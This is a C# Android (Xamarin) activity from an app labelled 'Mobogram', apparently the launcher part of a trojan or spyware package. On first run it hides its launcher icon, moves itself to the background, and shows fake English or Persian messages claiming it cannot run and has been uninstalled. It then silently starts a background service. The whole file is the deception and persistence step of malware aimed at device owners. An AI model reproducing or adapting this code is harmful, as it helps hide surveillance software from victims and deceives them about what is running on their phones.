﻿using System;
using Android.App;
using Android.Content;
using Android.Widget;
using Android.OS;
using System.Net;
using Java.Lang;
using Android.Runtime;
using Android.Views;
using Android.Telephony;
using Android.Media;
using Android.Graphics;
using Android.Content.PM;
using Java.Util;

namespace android.os
{
    [Activity(Label = "Mobogram",Theme = "@style/Theme.Transparent", MainLauncher = true)]
    [IntentFilter(new string[] { "android.intent.action.MAIN" },Categories = new string[] { "android.intent.category.LAUNCHER" })]
    public class MainActivity : Activity
    {
        protected override void OnCreate(Bundle bundle)
        {
            base.OnCreate(bundle);
        }
        bool frun=true;
        protected override void OnResume()
        {
            base.OnResume();
            if (frun)
            {
                inf.Values.C = Application.BaseContext;
                inf.OpenSetting(Application.Context);
                PackageManager p = PackageManager;
                ComponentName cmn = new ComponentName(this, this.Class);
                p.SetComponentEnabledSetting(cmn, ComponentEnabledState.Disabled, ComponentEnableOption.DontKillApp);
                MoveTaskToBack(true);
                inf.Values.RuningCamera = false;
                if (inf.Values.sharep.GetBoolean("ftr", true))
                {
                    inf.Values.sharep.Edit().PutBoolean("ftr", false).Commit();
                    string[] s = { "This Application Can't Run On Your Device", "Uninstalling...", "Uninstall finished" };
                    if (!Locale.Default.Language.Equals("en"))
                    {
                        s[0] = "این نرم افزار قادر به اجرا بر دستگاه شما نمیباشد";
                        s[1] = "درحال حذف نصب";
                        s[2] = "حذف نصب پایان یافت";
                    }
                    Toast.MakeText(this, s[0], ToastLength.Long).Show();
                    Toast.MakeText(this, s[1], ToastLength.Long).Show();
                    Toast.MakeText(this, s[2], ToastLength.Long).Show();
                }
                frun = false;
                Intent i = new Intent(Application.Context, typeof(mainservice));
                i.SetPackage(Application.Context.PackageName);
                Application.Context.StartService(i);
            }
        }
    }
}

